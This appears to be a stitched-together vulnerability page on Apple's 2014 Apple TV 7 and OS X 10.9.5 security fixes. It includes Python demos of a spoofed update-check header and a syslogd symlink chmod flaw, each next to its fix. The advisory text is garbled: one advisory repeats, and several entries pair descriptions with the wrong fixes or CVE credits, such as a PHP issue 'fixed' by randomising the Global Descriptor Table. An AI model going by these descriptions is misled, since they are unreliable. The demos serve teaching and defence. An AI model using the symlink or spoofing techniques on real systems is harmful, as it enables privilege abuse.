Available for: Apple TV 3rd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out-of-bounds read issue existed in rt_setgate. This
may lead to memory disclosure or memory corruption. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2014-4408
Apple TV
Available for: Apple TV 3rd generation and later
Impact: Some kernel hardening measures may be bypassed
Description: The 'early' random number generator used in some kernel
hardening measures was not cryptographically secure, and some of its
output was exposed to user space, allowing bypass of the hardening
measures. This issue was addressed by replacing the random number
generator with a cryptographically secure algorithm, and using a
16-byte seed.
CVE-ID
CVE-2014-4422 : Tarjei Mandt of Azimuth Security
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with root privileges
Description: An out-of-bounds write issue existed in Libnotify. This
issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4381 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: syslogd followed symbolic links while changing
permissions on files. This issue was addressed through improved
handling of symbolic links.
CVE-ID
CVE-2014-4372 : Tielei Wang and YeongJin Jang of Georgia Tech
Information Security Center (GTISC)
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-6663 : Atte Kettunen of OUSPG
CVE-2014-1384 : Apple
CVE-2014-1385 : Apple
CVE-2014-1387 : Google Chrome Security Team
CVE-2014-1388 : Apple
CVE-2014-1389 : Apple
CVE-2014-4410 : Eric Seidel of Google
CVE-2014-4411 : Google Chrome Security Team
CVE-2014-4412 : Apple
CVE-2014-4413 : Apple
CVE-2014-4414 : Apple
CVE-2014-4415 : Apple
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJUGMh1AAoJEBcWfLTuOo7tSWgP/j19RyvhyRDhJJyBozeK/pN6
6pgKhW3R++yi3COOjYX9oGmupiDNlIz5Rd7pkZMxq+f6BbwBh+hzXoPDdHw33yRO
pQ9nV32gDIBlQRjvqmJgU/w6ODJWdPukcGBZqqjTjywce/tDxC9ZQBZLcRRuifXl
dQdCYmXpkIcyZ3Yh9uF6sSXy0vngZr7kvvyJnst4WTmjqF3X9Sak75/s8Xa4oLyg
naD+o2ITisuMk7dEmY6p1vqhbbQIxIeg315VyQxoGfsml9IPtOI5SWOPO+wi6nNd
PyHKTFuhmlqjE+tKdBLulBMQPNreF0bCP+iNipBtAUS8RUyR19dfkDDjJeBbcqp7
Lsl4+6XsXABKPjrj66pBl7M7NZR+9mRfJbr83gmDN7hXu2OZJ7PxH49UKmr7JkeK
OWlMyiyd4NfigtlasUTnom+Jky+uIDy/JYBGkumgoCG50cdt+BAQgb8CiPCS11LK
OX0Ra4X8juRxh9TajQ+afx6r5Ma0Zdhj+ONzGJaTCCV+/NVjSKb/o+MfxlSiRYBN
ot4R5cbQFHFDxcpMW+5S8EYt8mgUmn7oCxBm21mj9hzo9pqDVWTABaIUywI4+4n4
uWnZKxtit873cik8gE+NtbngtF3/q40n0Wvf3UzP6RTedl9g56wmjZ8NPvKWL8rE
vHsGbux+Eb0CYjDTQqqS
=98h5
-----END PGP SIGNATURE-----
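The update-check logic behind CVE-2014-4383 in the Apple TV 7 advisory above (a spoofed future Last-Modified reused as If-Modified-Since so that every later honest check returns 304) is easier to see in code. The model below is an added example, not Apple's code: an honest catalog server, an attacker who answers one request with a far-future date, and an update client with and without validation of the Last-Modified header against the device clock. The header names and date format are real HTTP; the timeline and the server are constructed.

```python
"""Conditional update check with and without Last-Modified validation.

Added example, not Apple's code. Models CVE-2014-4383: the client keeps
the Last-Modified of the last response and replays it as If-Modified-Since.
One spoofed response with a far-future Last-Modified makes every later
honest check compare the real catalog date against that future date and
answer 304, so the device believes it is up to date indefinitely.
"""
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime

# Constructed timeline for the demonstration.
NOW = datetime(2014, 9, 17, 12, 0, tzinfo=timezone.utc)
CATALOG_V1 = NOW - timedelta(days=30)   # catalog published a month ago
CATALOG_V2 = NOW + timedelta(days=1)    # a new build is published tomorrow


class CatalogServer:
    """Honest server: 304 if the catalog is not newer than If-Modified-Since,
    otherwise 200 with the catalog's real Last-Modified."""

    def __init__(self, last_modified):
        self.last_modified = last_modified

    def get(self, if_modified_since):
        if if_modified_since is not None and self.last_modified <= if_modified_since:
            return 304, {}
        return 200, {"Last-Modified": format_datetime(self.last_modified, usegmt=True)}


class SpoofingAttacker:
    """Privileged network position: answers one request with a far-future
    Last-Modified, then steps aside and lets the honest server answer."""

    def __init__(self, server, spoofed_date):
        self.server = server
        self.spoofed = spoofed_date
        self.used = False

    def get(self, if_modified_since):
        if not self.used:
            self.used = True
            return 200, {"Last-Modified": format_datetime(self.spoofed, usegmt=True)}
        return self.server.get(if_modified_since)


class UpdateClient:
    """Stores the last Last-Modified and replays it as If-Modified-Since."""

    def __init__(self, validate_last_modified):
        self.validate = validate_last_modified
        self.if_modified_since = None   # the catalog date the device believes in

    def check(self, transport, now):
        status, headers = transport.get(self.if_modified_since)
        if status == 304:
            return "up to date"
        last_modified = parsedate_to_datetime(headers["Last-Modified"])
        if self.validate and last_modified > now:
            # The fix: a publish date in the future cannot be genuine, so it
            # must not become the baseline for later conditional requests.
            return "rejected future Last-Modified"
        self.if_modified_since = last_modified
        return "updated"


def run_scenario(validate):
    """Honest check, one spoofed answer, then a real update is published.

    Returns the client's three results and whether it ended up on CATALOG_V2.
    """
    server = CatalogServer(CATALOG_V1)
    client = UpdateClient(validate)
    log = [client.check(server, NOW)]                               # installs V1
    attacker = SpoofingAttacker(server, NOW + timedelta(days=3650))
    log.append(client.check(attacker, NOW + timedelta(hours=1)))    # attacker answers once
    server.last_modified = CATALOG_V2                               # real update published
    log.append(client.check(server, NOW + timedelta(days=2)))       # honest check afterwards
    return log, client.if_modified_since == CATALOG_V2


if __name__ == "__main__":
    for validate in (False, True):
        log, current = run_scenario(validate)
        print("validate=%s: %s -> on latest catalog: %s" % (validate, log, current))
```

Without validation the third check returns "up to date" although a newer catalog exists, and the client never leaves the attacker's date. With validation the spoofed response is discarded, the stored If-Modified-Since stays at the last genuine date, and the next honest check picks up the new build. A deployed check would allow a small tolerance for clock skew rather than rejecting any date a few seconds ahead of the device clock.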
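The syslogd entry for CVE-2014-4372 in the Apple TV 7 advisory above describes a daemon that changed permissions on a file by path and therefore followed a symlink planted at that path. The following is an added example, not Apple's code, of the vulnerable pattern next to the usual fix: open the path with O_NOFOLLOW, verify what was opened, and apply fchmod to the descriptor. The file names are constructed and the demonstration runs in a throwaway directory on Linux or macOS.

```python
"""chmod by path (follows symlinks) versus chmod through an O_NOFOLLOW descriptor.

Added example, not Apple's code, for the flaw class of CVE-2014-4372: a
privileged daemon changes the mode of a file by name, and a local user who
can place a symlink at that name redirects the chmod to any file. The
victim/log file names below are constructed for the demonstration.
"""
import errno
import os
import stat
import tempfile


def chmod_follows_symlinks(path, mode):
    """The vulnerable pattern: chmod() by name resolves a planted symlink."""
    os.chmod(path, mode)


def chmod_no_follow(path, mode):
    """Refuse symlinks, then change the mode on the open descriptor.

    O_NOFOLLOW makes open() fail (ELOOP on Linux/macOS, EMLINK on some BSDs)
    when the last path component is a symlink, so a planted link is rejected
    rather than followed. fchmod on the descriptor cannot be redirected by
    swapping the name after the open.
    """
    flags = os.O_RDONLY | os.O_NOFOLLOW
    if hasattr(os, "O_NOCTTY"):
        flags |= os.O_NOCTTY
    try:
        fd = os.open(path, flags)
    except OSError as e:
        if e.errno in (errno.ELOOP, errno.EMLINK):
            raise PermissionError("refusing to chmod through a symlink: %s" % path) from e
        raise
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError("not a regular file: %s" % path)
        os.fchmod(fd, mode)
    finally:
        os.close(fd)


def demo(use_safe_chmod):
    """Plant a symlink where the daemon expects its log file.

    Returns True if the victim file's mode was changed (the attack worked).
    """
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "victim")        # stands in for a file the user cannot touch
        with open(victim, "w") as f:
            f.write("secret\n")
        os.chmod(victim, 0o600)
        logfile = os.path.join(d, "system.log")   # the path the daemon will chmod
        os.symlink(victim, logfile)               # planted by the local user
        try:
            if use_safe_chmod:
                chmod_no_follow(logfile, 0o666)
            else:
                chmod_follows_symlinks(logfile, 0o666)
        except PermissionError:
            pass
        return stat.S_IMODE(os.stat(victim).st_mode) != 0o600


if __name__ == "__main__":
    print("chmod by path changed the victim:", demo(use_safe_chmod=False))
    print("fd-based chmod changed the victim:", demo(use_safe_chmod=True))
```

The same descriptor-based approach applies to chown, truncate and writes: resolve the name once with O_NOFOLLOW, check the result with fstat, and do everything else on the descriptor. Python's os.chmod(path, mode, follow_symlinks=False) is only usable where the platform provides lchmod, so the open-then-fchmod route is the portable one.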
| VAR-201409-0518 | CVE-2014-4381 | Multiple Apple products Libnotify arbitrary code execution with root privileges vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Libnotify in Apple iOS before 8 and Apple TV before 7 lacks proper bounds checking on write operations, which allows attackers to execute arbitrary code as root via a crafted application.
An attacker can leverage this issue to execute arbitrary code with system privileges. Failed exploit attempts will likely result in denial-of-service conditions. Apple iOS and TV are prone to multiple security vulnerabilities. These issues affect the following components:
802.1X, Accounts, Accessibility, Accounts Framework, Address Book, App Installation, Assets, Bluetooth, CoreGraphics, Foundation, Home & Lock Screen, iMessage, IOAcceleratorFamily, IOHIDFamily, IOKit, Kernel, Libnotify, Mail, Profiles, Safari, Sandbox Profiles, syslog and WebKit components.
Successfully exploiting these issues may allow attackers to crash the affected device, bypass security restrictions, obtain sensitive information, or execute arbitrary code. Other attacks are also possible.
This BID is being retired. The following individual records exist to better document the issues:
69913 Apple iOS and TV CVE-2014-4364 Spoofing Vulnerability
69917 Apple iOS CVE-2014-4423 Information Disclosure Vulnerability
69926 Apple iOS Lock Screen CVE-2014-4368 Security Bypass Vulnerability
69930 Apple iOS and TV CVE-2014-4357 Local Information Disclosure Security Vulnerability
69932 Apple iOS CVE-2014-4352 Local Information Disclosure Security Vulnerability
69936 Apple iOS CVE-2014-4386 Local Privilege Escalation Vulnerability
69940 Apple iOS CVE-2014-4384 Local Privilege Escalation Vulnerability
69941 Apple iOS and TV CVE-2014-4383 Security Bypass Vulnerability
69943 Apple iOS CVE-2014-4354 Unspecified Security Vulnerability
69903 Multiple Apple Products CVE-2014-4377 PDF Handling Integer Overflow Vulnerability
69915 Apple TV/Mac OS X/iOS CVE-2014-4378 Out of Bounds Read Memory Corruption Vulnerability
69905 Apple Mac OS X and iOS CVE-2014-4374 XML External Entity Information Disclosure Vulnerability
69921 Apple TV/Mac OS X/iOS CVE-2014-4379 Out of Bounds Read Memory Corruption Vulnerability
69929 Apple TV and iOS CVE-2014-4369 NULL Pointer Dereference Denial of Service Vulnerability
69934 Apple TV and iOS CVE-2014-4373 NULL Pointer Dereference Denial of Service Vulnerability
69938 Apple TV and iOS CVE-2014-4405 NULL Pointer Dereference Remote Code Execution Vulnerability
69942 Apple TV and iOS CVE-2014-4380 Out of Bounds Read Write Remote Code Execution Vulnerability
69947 Apple TV and iOS CVE-2014-4404 Heap Based Buffer Overflow Vulnerability
69949 Apple iOS CVE-2014-4361 Security Bypass Vulnerability
69951 Apple iOS CVE-2014-4353 Race Condition Local Information Disclosure Vulnerability
69912 Apple iOS and TV CVE-2014-4407 Information Disclosure Security Vulnerability
69919 Apple iOS and TV CVE-2014-4371 Unspecified Security Vulnerability
69924 Apple iOS and TV CVE-2014-4421 Unspecified Security Vulnerability
69927 Apple iOS and TV CVE-2014-4420 Unspecified Security Vulnerability
69928 Apple iOS and TV CVE-2014-4419 Unspecified Security Vulnerability
69939 Apple iOS and TV CVE-2014-4408 Out of Bounds Read Local Memory Corruption Vulnerability
69944 Apple iOS and TV CVE-2014-4375 Local Memory Corruption Vulnerability
69946 Apple iOS and TV CVE-2014-4418 Remote Code Execution Vulnerability
69948 Apple TV/Mac OS X/iOS CVE-2014-4388 Remote Code Execution Vulnerability
69950 Apple TV/Mac OS X/iOS CVE-2014-4389 Integer Buffer Overflow Vulnerability
69937 WebKit Private Browsing CVE-2014-4409 Security Bypass Vulnerability
69911 Apple iOS and TV CVE-2014-4422 Security Bypass Vulnerability
69931 Apple TV/Mac OS X/iOS CVE-2014-4381 Arbitrary Code Execution Vulnerability
69914 Apple iOS CVE-2014-4366 Information Disclosure Vulnerability
69945 Apple iOS CVE-2014-4367 Security Vulnerability
69920 Apple iOS CVE-2014-4362 Information Disclosure Vulnerability
69922 Apple iOS CVE-2014-4356 Local Information Disclosure Vulnerability
69923 Apple iOS and TV CVE-2014-4372 Local Security Bypass Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-09-17-2 Apple TV 7
Apple TV 7 is now available and addresses the following:
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker can obtain WiFi credentials
Description: An attacker could have impersonated a WiFi access
point, offered to authenticate with LEAP, broken the MS-CHAPv1 hash,
and used the derived credentials to authenticate to the intended
access point even if that access point supported stronger
authentication methods. This issue was addressed by removing support
for LEAP.
CVE-ID
CVE-2014-4364 : Pieter Robyns, Bram Bonne, Peter Quax, and Wim
Lamotte of Universiteit Hasselt
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker with access to a device may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-4357 : Heli Myllykoski of OP-Pohjola Group
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker with a privileged network position may be able
to cause a device to think that it is up to date even when it is not
Description: A validation issue existed in the handling of update
check responses. Spoofed dates from Last-Modified response headers
set to future dates were used for If-Modified-Since checks in
subsequent update requests. This issue was addressed by validation of
the Last-Modified header.
CVE-ID
CVE-2014-4383 : Raul Siles of DinoSec
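The failure mode described above, as an added example that is not part of the advisory or of Apple's update client: a client that stores whatever Last-Modified value it receives beside one that validates the header against its own clock, plus a model of the genuine server's conditional GET showing which client still notices a later real update. CLOCK_SKEW, the function names and all dates are constructed assumptions.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime
from typing import Optional

# Constructed model of the CVE-2014-4383 failure mode; this is not Apple's
# update-client code. A spoofed Last-Modified header carrying a future date
# is stored and replayed as If-Modified-Since, so the genuine server keeps
# answering 304 Not Modified and the device believes it is up to date.

CLOCK_SKEW = timedelta(minutes=5)   # assumed tolerance for client clock drift


def unvalidated_store(header: str, previous: Optional[datetime]) -> Optional[datetime]:
    """Pre-fix behaviour: trust whatever Last-Modified the response carried."""
    try:
        return parsedate_to_datetime(header)
    except (TypeError, ValueError):     # unparsable header: keep the old value
        return previous


def validated_store(header: str, now: datetime,
                    previous: Optional[datetime]) -> Optional[datetime]:
    """Hardened: keep the previous value if the header is unparsable or
    claims a modification time in the future (beyond tolerated skew)."""
    try:
        stamp = parsedate_to_datetime(header)
    except (TypeError, ValueError):
        return previous
    if stamp.tzinfo is None:            # a "-0000" zone yields a naive datetime
        stamp = stamp.replace(tzinfo=timezone.utc)
    if stamp > now + CLOCK_SKEW:        # future date: do not persist it
        return previous
    return stamp


def origin_reports_modified(origin_last_modified: datetime,
                            if_modified_since: Optional[datetime]) -> bool:
    """Genuine server's conditional GET: 200 (True) only if newer than IMS."""
    return if_modified_since is None or origin_last_modified > if_modified_since


def update_detected_after_spoof(validate: bool) -> bool:
    """One spoofed response, then a genuine update ships; does the client see it?"""
    now = datetime(2014, 9, 17, 9, 0, tzinfo=timezone.utc)
    stored = datetime(2014, 9, 1, tzinfo=timezone.utc)        # last honest value
    spoofed = "Sat, 01 Jan 2050 00:00:00 GMT"                 # constructed attacker header
    stored = validated_store(spoofed, now, stored) if validate \
        else unvalidated_store(spoofed, stored)
    genuine_update = datetime(2014, 9, 17, 10, 0, tzinfo=timezone.utc)
    return origin_reports_modified(genuine_update, stored)
```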
Apple TV
Available for: Apple TV 3rd generation and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in the handling of PDF
files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4377 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
Apple TV
Available for: Apple TV 3rd generation and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or an information disclosure
Description: An out of bounds memory read existed in the handling of
PDF files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4378 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An application may cause an unexpected system termination
Description: A null pointer dereference existed in the handling of
IOAcceleratorFamily API arguments. This issue was addressed through
improved validation of IOAcceleratorFamily API arguments.
CVE-ID
CVE-2014-4369 : Catherine aka winocm
Apple TV
Available for: Apple TV 3rd generation and later
Impact: The device may unexpectedly restart
Description: A NULL pointer dereference was present in the
IntelAccelerator driver. The issue was addressed by improved error
handling.
CVE-ID
CVE-2014-4373 : cunzhang from Adlab of Venustech
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to read kernel pointers,
which can be used to bypass kernel address space layout randomization
Description: An out-of-bounds read issue existed in the handling of
an IOHIDFamily function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-4379 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A heap buffer overflow existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-4404 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A null pointer dereference existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved validation of IOHIDFamily key-mapping properties.
CVE-ID
CVE-2014-4405 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with kernel privileges
Description: An out-of-bounds write issue existed in the IOHIDFamily
kernel extension. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-4380 : cunzhang from Adlab of Venustech
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to read uninitialized
data from kernel memory
Description: An uninitialized memory access issue existed in the
handling of IOKit functions. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2014-4407 : @PanguTeam
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4418 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of IOKit API arguments.
CVE-ID
CVE-2014-4389 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to determine kernel memory layout
Description: Multiple uninitialized memory issues existed in the
network statistics interface, which led to the disclosure of kernel
memory content. This issue was addressed through additional memory
initialization.
CVE-ID
CVE-2014-4371 : Fermin J. Serna of the Google Security Team
CVE-2014-4419 : Fermin J. Serna of the Google Security Team
CVE-2014-4420 : Fermin J. Serna of the Google Security Team
CVE-2014-4421 : Fermin J. Serna of the Google Security Team
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A person with a privileged network position may cause a
denial of service
Description: A race condition issue existed in the handling of IPv6
packets. This issue was addressed through improved lock state
checking.
CVE-ID
CVE-2011-2391 : Marc Heuse
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: A double free issue existed in the handling of Mach
ports. This issue was addressed through improved validation of Mach
ports.
CVE-ID
CVE-2014-4375
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out-of-bounds read issue existed in rt_setgate. This
may lead to memory disclosure or memory corruption. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2014-4408
Apple TV
Available for: Apple TV 3rd generation and later
Impact: Some kernel hardening measures may be bypassed
Description: The 'early' random number generator used in some kernel
hardening measures was not cryptographically secure, and some of its
output was exposed to user space, allowing bypass of the hardening
measures. This issue was addressed by replacing the random number
generator with a cryptographically secure algorithm, and using a
16-byte seed. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-4381 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: syslogd followed symbolic links while changing
permissions on files. This issue was addressed through improved
handling of symbolic links.
CVE-ID
CVE-2014-4372 : Tielei Wang and YeongJin Jang of Georgia Tech
Information Security Center (GTISC)
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-6663 : Atte Kettunen of OUSPG
CVE-2014-1384 : Apple
CVE-2014-1385 : Apple
CVE-2014-1387 : Google Chrome Security Team
CVE-2014-1388 : Apple
CVE-2014-1389 : Apple
CVE-2014-4410 : Eric Seidel of Google
CVE-2014-4411 : Google Chrome Security Team
CVE-2014-4412 : Apple
CVE-2014-4413 : Apple
CVE-2014-4414 : Apple
CVE-2014-4415 : Apple
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-09-17-3 OS X Mavericks 10.9.5 and Security Update
2014-004
OS X Mavericks 10.9.5 and Security Update 2014-004 are now available
and address the following:
apache_mod_php
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: Multiple vulnerabilities in PHP 5.4.24
Description: Multiple vulnerabilities existed in PHP 5.4.24, the
most serious of which may have led to arbitrary code execution. This
issue was addressed through always allocating the Global Descriptor
Table at random addresses. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-4381 : Ian Beer of Google Project Zero
OpenSSL
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4
Impact: Multiple vulnerabilities in OpenSSL 0.9.8y, including one
that may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in OpenSSL 0.9.8y.
These issues were addressed by updating OpenSSL to version 0.9.8za.